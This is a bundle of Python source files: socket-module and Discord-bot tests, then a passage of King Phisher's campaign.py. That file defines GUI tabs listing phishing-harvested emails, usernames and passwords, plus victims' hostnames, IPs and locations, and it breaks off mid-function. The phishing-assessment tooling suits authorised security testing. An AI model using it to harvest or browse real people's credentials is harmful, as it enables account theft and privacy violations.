knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = socket_helper.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
                self.assertEqual(s.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
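# Illustrative sketch (not part of the test suite): create_server() with
# dualstack_ipv6=True yields a single listening socket that accepts both IPv4
# and IPv6 clients, which the dual-stack tests below verify end to end.  The
# port is a placeholder.
def _demo_dualstack_listener(port=0):
    import socket as _socket
    if not _socket.has_dualstack_ipv6():
        raise RuntimeError("dual-stack IPv6 is not supported on this platform")
    return _socket.create_server(("", port), family=_socket.AF_INET6,
                                 dualstack_ipv6=True)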
class CreateServerFunctionalTest(unittest.TestCase):
timeout = support.LOOPBACK_TIMEOUT
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
@requireAttrs(socket, "send_fds")
@requireAttrs(socket, "recv_fds")
@requireAttrs(socket, "AF_UNIX")
class SendRecvFdsTests(unittest.TestCase):
def testSendAndRecvFds(self):
def close_pipes(pipes):
for fd1, fd2 in pipes:
os.close(fd1)
os.close(fd2)
def close_fds(fds):
for fd in fds:
os.close(fd)
# send 10 file descriptors
pipes = [os.pipe() for _ in range(10)]
self.addCleanup(close_pipes, pipes)
fds = [rfd for rfd, wfd in pipes]
# use a UNIX socket pair to exchange file descriptors locally
sock1, sock2 = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
with sock1, sock2:
socket.send_fds(sock1, [MSG], fds)
# request more data and file descriptors than expected
msg, fds2, flags, addr = socket.recv_fds(sock2, len(MSG) * 2, len(fds) * 2)
self.addCleanup(close_fds, fds2)
self.assertEqual(msg, MSG)
self.assertEqual(len(fds2), len(fds))
self.assertEqual(flags, 0)
# don't test addr
# test that file descriptors are connected
for index, fds in enumerate(pipes):
rfd, wfd = fds
os.write(wfd, str(index).encode())
for index, rfd in enumerate(fds2):
data = os.read(rfd, 100)
self.assertEqual(data, str(index).encode())
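# Illustrative sketch (not part of the test suite): socket.send_fds() and
# socket.recv_fds() wrap the SCM_RIGHTS ancillary-data handling exercised in
# SendRecvFdsTests above.  This helper, assuming a POSIX platform and Python
# 3.9+, passes one open file descriptor across a UNIX socket pair.
def _demo_pass_fd(path):
    import os as _os
    import socket as _socket
    a, b = _socket.socketpair(_socket.AF_UNIX, _socket.SOCK_STREAM)
    with a, b, open(path, "rb") as f:
        _socket.send_fds(a, [b"fd coming"], [f.fileno()])
        msg, fds, flags, _addr = _socket.recv_fds(b, 1024, 1)
        try:
            # the received descriptor refers to the same open file
            return msg, _os.read(fds[0], 16)
        finally:
            for fd in fds:
                _os.close(fd)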
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest,
SendRecvFdsTests]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.append(BasicBluetoothTest)
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgUDPLITETest,
RecvmsgUDPLITETest,
RecvmsgIntoUDPLITETest,
SendmsgUDPLITE6Test,
RecvmsgUDPLITE6Test,
RecvmsgRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoUDPLITE6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
tests.append(TestMacOSTCPFlags)
thread_info = threading_helper.threading_setup()
support.run_unittest(*tests)
threading_helper.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
test_add_event.py
|
# From https://stackoverflow.com/questions/25827160/importing-correctly-with-pytest
# Add the ../src directory to sys.path so the test cases can find the source files
import sys, os
import asyncio
import discord
import discord.ext.commands as commands
import discord.ext.test as test
import threading
import time
sys.path.append(os.path.realpath(os.path.dirname(__file__) + "/../src"))
import pytest
from datetime import datetime
from functionality.AddEvent import check_complete, add_event # type: ignore
@pytest.fixture
def client(event_loop):
c = discord.Client(loop=event_loop)
test.configure(c)
return c
@pytest.fixture
def bot(request, event_loop):
intents = discord.Intents.default()
intents.members = True
b = commands.Bot(command_prefix="!", loop=event_loop, intents=intents)
@b.command()
async def test_add(ctx):
thread = threading.Thread(target=add_event, args=(ctx, b), daemon=True)
thread.start()
    marks = request.function.pytestmark
    mark = None
    for m in marks:
        if m.name == "cogs":
            mark = m
            break
if mark is not None:
for extension in mark.args:
b.load_extension("tests.internal." + extension)
test.configure(b)
return b
@pytest.mark.asyncio
async def test_add_event(bot):
await test.message("!test_add")
await asyncio.sleep(.25)
def check_variables1():
output = {
"start": False,
"start_date": datetime(2021, 9, 29, 21, 30),
"end": False,
"end_date": datetime(2021, 9, 29, 23, 30),
"array": [],
#"location": "",
}
return output
def check_variables2():
output = {
"start": True,
"start_date": datetime(2021, 9, 29, 21, 30),
"end": False,
"end_date": datetime(2021, 9, 29, 23, 30),
"array": [],
#"location": "None",
}
return output
def check_variables3():
output = {
"start": True,
"start_date": datetime(2021, 9, 29, 21, 30),
"end": True,
"end_date": datetime(2021, 9, 29, 23, 30),
"array": [],
#"location": "None",
}
return output
def check_variables4():
output = {
"start": True,
"start_date": datetime(2021, 9, 29, 21, 30),
"end": True,
"end_date": datetime(2021, 9, 29, 23, 30),
"array": ["Hello"],
#"location": "None",
}
return output
def test_check():
example1 = check_variables1()
example2 = check_variables2()
example3 = check_variables3()
example4 = check_variables4()
assert not (
check_complete(
example1["start"],
example1["start_date"],
example1["end"],
example1["end_date"],
example1["array"],
#example1["location"],
)
)
assert not (
check_complete(
example2["start"],
example2["start_date"],
example2["end"],
example2["end_date"],
example2["array"],
#example1["location"],
)
)
assert check_complete(
example3["start"],
example3["start_date"],
example3["end"],
example3["end_date"],
example3["array"],
#example1["location"],
)
assert check_complete(
example4["start"],
example4["start_date"],
example4["end"],
example4["end_date"],
example4["array"],
#example1["location"],
)
|
campaign.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/client/tabs/campaign.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import datetime
import logging
import threading
import time
from king_phisher import errors
from king_phisher import find
from king_phisher import ipaddress
from king_phisher import utilities
from king_phisher.client import export
from king_phisher.client import graphs
from king_phisher.client import gui_utilities
from king_phisher.client.widget import extras
from king_phisher.client.widget import managers
from gi.repository import GdkPixbuf
from gi.repository import GLib
from gi.repository import Gtk
from smoke_zephyr.utilities import parse_timespan
UNKNOWN_LOCATION_STRING = 'N/A (Unknown)'
class CampaignViewGenericTab(gui_utilities.GladeGObject):
"""
This object is meant to be subclassed by all of the tabs which load and
display information about the current campaign.
"""
label_text = 'Unknown'
"""The label of the tab for display in the GUI."""
top_gobject = 'box'
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTab, self).__init__(*args, **kwargs)
self.label = Gtk.Label(label=self.label_text)
"""The :py:class:`Gtk.Label` representing this tab with text from :py:attr:`~.CampaignViewGenericTab.label_text`."""
self.is_destroyed = threading.Event()
getattr(self, self.top_gobject).connect('destroy', self.signal_destroy)
self.last_load_time = float('-inf')
"""The last time the data was loaded from the server."""
self.refresh_frequency = parse_timespan(str(self.config.get('gui.refresh_frequency', '5m')))
"""The lifetime in seconds to wait before refreshing the data from the server."""
self.loader_thread = None
"""The thread object which loads the data from the server."""
self.loader_thread_lock = threading.Lock()
"""The :py:class:`threading.Lock` object used for synchronization between the loader and main threads."""
self.loader_thread_stop = threading.Event()
"""The :py:class:`threading.Event` object used to request that the loader thread stop before completion."""
self.application.connect('campaign-set', self.signal_kpc_campaign_set)
def _sync_loader_thread(self):
"""
Synchronize the loader thread by ensuring that it is stopped. If it is
currently running, this will use :py:attr:`~.loader_thread_stop` to
request that the loader stops early.
"""
if not self.loader_thread_is_running:
return
# it's alive so tell it to stop, wait for it, then proceed
self.loader_thread_stop.set()
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
self.loader_thread.join(1)
@property
def rpc(self):
return self.application.rpc
@property
def loader_thread_is_running(self):
if self.loader_thread is None:
return False
return self.loader_thread.is_alive()
def load_campaign_information(self, force=True):
raise NotImplementedError()
def signal_button_clicked_refresh(self, button):
self.load_campaign_information()
def signal_destroy(self, gobject):
self.is_destroyed.set()
self.loader_thread_stop.set()
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
self.logger.debug("waiting on thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
self.logger.debug("joined thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
def signal_kpc_campaign_set(self, *_):
self.load_campaign_information()
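# Illustrative sketch (not part of King Phisher): the loader threads managed by
# the tabs above use the cooperative-stop pattern that _sync_loader_thread()
# describes -- a threading.Event requests an early exit and the worker checks
# it between units of work.
def example_cooperative_worker(work_items, stop_event):
	completed = []
	for item in work_items:
		if stop_event.is_set():
			break
		completed.append(item)
	return completed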
class CampaignViewGenericTableTab(CampaignViewGenericTab):
"""
This object is meant to be subclassed by tabs which will display
campaign information of different types from specific database
tables. The data in this object is refreshed when multiple events
occur and it uses an internal timer to represent the last time the
data was refreshed.
"""
dependencies = gui_utilities.GladeDependencies(
children=(
'button_refresh',
'treeview_campaign'
)
)
node_query = None
"""
The GraphQL query used to load a particular node from the remote table.
This query is provided with a single parameter of the node's id.
"""
table_name = ''
"""The database table represented by this tab."""
table_query = None
"""
The GraphQL query used to load the desired information from the remote
table. This query is provided with the following three parameters:
campaign, count and cursor.
"""
view_columns = ()
"""The dictionary map of column numbers to column names starting at column 1."""
xlsx_worksheet_options = None
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTableTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
self.treeview_manager = managers.TreeViewManager(
treeview,
selection_mode=Gtk.SelectionMode.MULTIPLE,
cb_delete=self._prompt_to_delete_row,
cb_refresh=self.load_campaign_information
)
self.treeview_manager.set_column_titles(self.view_columns, column_offset=1)
self.popup_menu = self.treeview_manager.get_popup_menu()
"""The :py:class:`Gtk.Menu` object which is displayed when right-clicking in the view area."""
treeview = self.gobjects['treeview_campaign']
store_columns = [str] * (len(self.view_columns) + 1)
store = Gtk.ListStore(*store_columns)
treeview.set_model(store)
self.application.connect('server-connected', self.signal_kp_server_connected)
def signal_kp_server_connected(self, _):
event_id = 'db-' + self.table_name.replace('_', '-')
server_events = self.application.server_events
if not server_events:
return
server_events.subscribe(event_id, ('deleted', 'inserted', 'updated'), ('id', 'campaign_id'))
server_events.connect(event_id, self.signal_server_event_db)
def signal_server_event_db(self, _, event_type, rows):
get_node = lambda id: self.rpc.graphql(self.node_query, {'id': str(id)})['db']['node']
for row in rows:
if str(row.campaign_id) != self.config['campaign_id']:
continue
model = self.gobjects['treeview_campaign'].get_model()
for case in utilities.switch(event_type):
if case('inserted'):
row_data = self.format_node_data(get_node(row.id))
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(row.id))
gui_utilities.glib_idle_add_wait(model.append, row_data)
ti = gui_utilities.gtk_list_store_search(model, str(row.id))
if ti is None:
self.logger.warning("received server db event: {0} for non-existent row {1}:{2}".format(event_type, self.table_name, str(row.id)))
break
if case('deleted'):
model.remove(ti)
break
if case('updated'):
row_data = self.format_node_data(get_node(row.id))
for idx, cell_data in enumerate(row_data, 1):
model[ti][idx] = self.format_cell_data(cell_data)
break
def _export_lock(self):
show_dialog_warning = lambda: gui_utilities.show_dialog_warning('Export Failed', self.parent, 'Can not export data while loading.')
if not self.loader_thread_lock.acquire(False):
show_dialog_warning()
return False
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
self.loader_thread_lock.release()
show_dialog_warning()
return False
return True
def _prompt_to_delete_row(self, treeview, _):
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
gui_utilities.show_dialog_warning('Can Not Delete Rows While Loading', self.parent)
return
model = treeview.get_model()
row_ids = [model.get_value(ti, 0) for ti in gui_utilities.gtk_treeview_selection_iterate(treeview)]
if len(row_ids) == 0:
return
elif len(row_ids) == 1:
message = 'Delete This Row?'
else:
message = "Delete These {0:,} Rows?".format(len(row_ids))
if not gui_utilities.show_dialog_yes_no(message, self.parent, 'This information will be lost.'):
return
self.application.emit(self.table_name[:-1] + '-delete', row_ids)
def format_node_data(self, node):
"""
This method is overridden by subclasses to format the raw node
data returned from the server. The length of the list must equal
the number of columns in the table. This method is called for
each node in the remote table by the loader thread.
:param dict node: The node from a GraphQL query representing data for this table.
:return: The formatted row data.
:rtype: list
"""
raise NotImplementedError()
def format_cell_data(self, cell_data, encoding='utf-8'):
"""
This method provides formatting to the individual cell values returned
		from the :py:meth:`.format_node_data` method. Values are converted into
		a format suitable for reading.
		:param cell_data: The value to format.
:param str encoding: The encoding to use to coerce the return value into a unicode string.
:return: The formatted cell value.
:rtype: str
"""
if isinstance(cell_data, datetime.datetime):
cell_data = utilities.datetime_utc_to_local(cell_data)
return utilities.format_datetime(cell_data, encoding=encoding)
if cell_data is None:
cell_data = ''
elif isinstance(cell_data, int):
cell_data = str(cell_data)
# ensure that the return value is a unicode string
if isinstance(cell_data, bytes):
cell_data = cell_data.decode(encoding)
return cell_data
def load_campaign_information(self, force=True):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the
:py:attr:`~.CampaignViewGenericTab.last_load_time` is compared
with the :py:attr:`~.CampaignViewGenericTab.refresh_frequency` to
check if the information is stale. If the local data is not stale,
this function will return without updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
with self.loader_thread_lock:
self._sync_loader_thread()
self.loader_thread_stop.clear()
store = self.gobjects['treeview_campaign'].get_model()
store.clear()
self.loader_thread = utilities.Thread(target=self.loader_thread_routine, args=(store,))
self.loader_thread.daemon = True
self.loader_thread.start()
return
def loader_thread_routine(self, store):
"""
The loading routine to be executed within a thread.
:param store: The store object to place the new data.
:type store: :py:class:`Gtk.ListStore`
"""
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', False))
campaign_id = self.config['campaign_id']
count = 500
page_info = {'endCursor': None, 'hasNextPage': True}
while page_info['hasNextPage']:
if self.rpc is None:
break
try:
results = self.rpc.graphql(self.table_query, {'campaign': campaign_id, 'count': count, 'cursor': page_info['endCursor']})
except errors.KingPhisherGraphQLQueryError as error:
self.logger.error('graphql error: ' + error.message)
raise
if self.loader_thread_stop.is_set():
break
if self.is_destroyed.is_set():
break
for edge in results['db']['campaign'][self.table_name]['edges']:
node = edge['node']
row_data = self.format_node_data(node)
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(node['id']))
gui_utilities.glib_idle_add_wait(store.append, row_data)
page_info = results['db']['campaign'][self.table_name]['pageInfo']
if self.is_destroyed.is_set():
return
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', True))
self.last_load_time = time.time()
def signal_button_clicked_export(self, button):
self.export_table_to_csv()
def export_table_to_csv(self):
"""Export the data represented by the view to a CSV file."""
if not self._export_lock():
return
dialog = extras.FileChooserDialog('Export Data', self.parent)
file_name = self.config['campaign_name'] + '.csv'
response = dialog.run_quick_save(file_name)
dialog.destroy()
if not response:
self.loader_thread_lock.release()
return
destination_file = response['target_path']
store = self.gobjects['treeview_campaign'].get_model()
columns = dict(enumerate(('UID',) + self.view_columns))
export.liststore_to_csv(store, destination_file, columns)
self.loader_thread_lock.release()
def export_table_to_xlsx_worksheet(self, worksheet, title_format):
"""
Export the data represented by the view to an XLSX worksheet.
:param worksheet: The destination sheet for the store's data.
:type worksheet: :py:class:`xlsxwriter.worksheet.Worksheet`
:param title_format: The formatting to use for the title row.
:type title_format: :py:class:`xlsxwriter.format.Format`
"""
if not self._export_lock():
return
store = self.gobjects['treeview_campaign'].get_model()
columns = dict(enumerate(('UID',) + self.view_columns))
export.liststore_to_xlsx_worksheet(store, worksheet, columns, title_format, xlsx_options=self.xlsx_worksheet_options)
self.loader_thread_lock.release()
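# Illustrative sketch (hypothetical, not part of King Phisher): a minimal
# subclass showing the contract documented in format_node_data() above -- the
# returned sequence holds one value per entry in view_columns, in the same
# order, and format_cell_data() later coerces each value to a string.  The
# table name, column names and node fields are invented for illustration; the
# node_query and table_query GraphQL strings are omitted from this sketch.
class ExampleNotesTab(CampaignViewGenericTableTab):
	table_name = 'notes'
	label_text = 'Notes'
	view_columns = ('Author', 'Created', 'Note')
	def format_node_data(self, node):
		return (node['author'], node['created'], node['text'])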
class CampaignViewDeaddropTab(CampaignViewGenericTableTab):
"""Display campaign information regarding dead drop connections."""
table_name = 'deaddrop_connections'
label_text = 'Deaddrop'
node_query = """\
query getDeaddropConnection($id: String!) {
db {
node: deaddropConnection(id: $id) {
id
deaddropDeployment { destination }
count
ip
localUsername
localHostname
localIpAddresses
firstSeen
lastSeen
}
}
}
"""
table_query = """\
query getDeaddropConnections($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
deaddrop_connections: deaddropConnections(first: $count, after: $cursor) {
total
edges {
node {
id
deaddropDeployment {
id
destination
}
count
ip
localUsername
localHostname
localIpAddresses
firstSeen
lastSeen
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Destination',
'Visit Count',
'IP Address',
'Username',
'Hostname',
'Local IP Addresses',
'First Hit',
'Last Hit'
)
def format_node_data(self, connection):
deaddrop_destination = connection['deaddropDeployment']['destination']
if not deaddrop_destination:
return None
row = (
deaddrop_destination,
connection['count'],
connection['ip'],
connection['localUsername'],
connection['localHostname'],
connection['localIpAddresses'],
connection['firstSeen'],
connection['lastSeen']
)
return row
class CampaignViewCredentialsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding submitted credentials."""
table_name = 'credentials'
label_text = 'Credentials'
node_query = """\
query getCredential($id: String!) {
db {
node: credential(id: $id) {
id
message { targetEmail }
username
password
submitted
}
}
}
"""
table_query = """\
query getCredentials($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
credentials(first: $count, after: $cursor) {
total
edges {
node {
id
message { targetEmail }
username
password
submitted
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'Username',
'Password',
'Submitted'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(20, 30, 30, 30, 25),
title=label_text
)
def __init__(self, *args, **kwargs):
super(CampaignViewCredentialsTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
pwd_column_id = self.view_columns.index('Password')
treeview.get_column(pwd_column_id).set_property('visible', False)
def format_node_data(self, node):
row = (
node['message']['targetEmail'],
node['username'],
node['password'],
node['submitted']
)
return row
def signal_button_toggled_show_passwords(self, button):
treeview = self.gobjects['treeview_campaign']
pwd_column_id = self.view_columns.index('Password')
treeview.get_column(pwd_column_id).set_property('visible', button.get_property('active'))
class CampaignViewDashboardTab(CampaignViewGenericTab):
"""Display campaign information on a graphical dash board."""
dependencies = gui_utilities.GladeDependencies(
children=(
'box_top_left',
'box_top_right',
'box_bottom',
'scrolledwindow_top_left',
'scrolledwindow_top_right',
'scrolledwindow_bottom'
)
)
label_text = 'Dashboard'
"""The tabs label for display in the GUI."""
def __init__(self, *args, **kwargs):
super(CampaignViewDashboardTab, self).__init__(*args, **kwargs)
self.graphs = []
"""The :py:class:`.CampaignGraph` classes represented on the dash board."""
dash_ports = {
# dashboard position, (width, height)
'top_left': (380, 200),
'top_right': (380, 200),
'bottom': (760, 200)
}
for dash_port, details in dash_ports.items():
graph_name = self.config['dashboard.' + dash_port]
cls = graphs.get_graph(graph_name)
if not cls:
self.logger.warning('could not get graph: ' + graph_name)
logo_file_path = find.data_file('king-phisher-icon.svg')
if logo_file_path:
image = Gtk.Image.new_from_pixbuf(GdkPixbuf.Pixbuf.new_from_file_at_size(logo_file_path, 128, 128))
image.show()
self.gobjects['scrolledwindow_' + dash_port].add(image)
continue
graph_inst = cls(self.application, details, getattr(self, self.top_gobject).get_style_context())
self.gobjects['scrolledwindow_' + dash_port].add(graph_inst.canvas)
self.gobjects['box_' + dash_port].pack_end(graph_inst.navigation_toolbar, False, False, 0)
self.graphs.append(graph_inst)
self.logger.debug("dashboard refresh frequency set to {0} seconds".format(self.refresh_frequency))
GLib.timeout_add_seconds(self.refresh_frequency, self.loader_idle_routine)
def load_campaign_information(self, force=True):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the :py:attr:`~.last_load_time` is compared with
the :py:attr:`~.refresh_frequency` to check if the information is stale.
If the local data is not stale, this function will return without
updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
if not self.application.rpc:
self.logger.warning('skipping load_campaign_information because rpc is not initialized')
return
with self.loader_thread_lock:
self._sync_loader_thread()
self.loader_thread_stop.clear()
self.loader_thread = utilities.Thread(target=self.loader_thread_routine)
self.loader_thread.daemon = True
self.loader_thread.start()
def loader_idle_routine(self):
"""The routine which refreshes the campaign data at a regular interval."""
if self.rpc and not self.loader_thread_is_running:
self.logger.debug('idle loader routine called')
self.load_campaign_information()
return True
def loader_thread_routine(self):
"""The loading routine to be executed within a thread."""
		if 'campaign_id' not in self.config:
return
if not self.application.get_graphql_campaign():
return
info_cache = {}
for graph in self.graphs:
if self.loader_thread_stop.is_set():
break
if self.is_destroyed.is_set():
break
info_cache.update(gui_utilities.glib_idle_add_wait(lambda g=graph: g.refresh(info_cache, self.loader_thread_stop)))
else:
self.last_load_time = time.time()
class CampaignViewVisitsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding incoming visitors."""
table_name = 'visits'
label_text = 'Visits'
node_query = """\
query getVisit($id: String!) {
db {
node: visit(id: $id) {
id
message { targetEmail }
ip
count
userAgent
ipGeoloc { city }
firstSeen
lastSeen
}
}
}
"""
table_query = """\
query getVisits($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
visits(first: $count, after: $cursor) {
total
edges {
node {
id
message { targetEmail }
ip
count
userAgent
ipGeoloc { city }
firstSeen
lastSeen
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'IP Address',
'Visit Count',
'Visitor User Agent',
'Visitor Location',
'First Visit',
'Last Visit'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(30, 30, 25, 15, 90, 30, 25, 25),
title=label_text
)
def format_node_data(self, node):
geo_location = UNKNOWN_LOCATION_STRING
visitor_ip = node['ip']
if visitor_ip is None:
visitor_ip = ''
else:
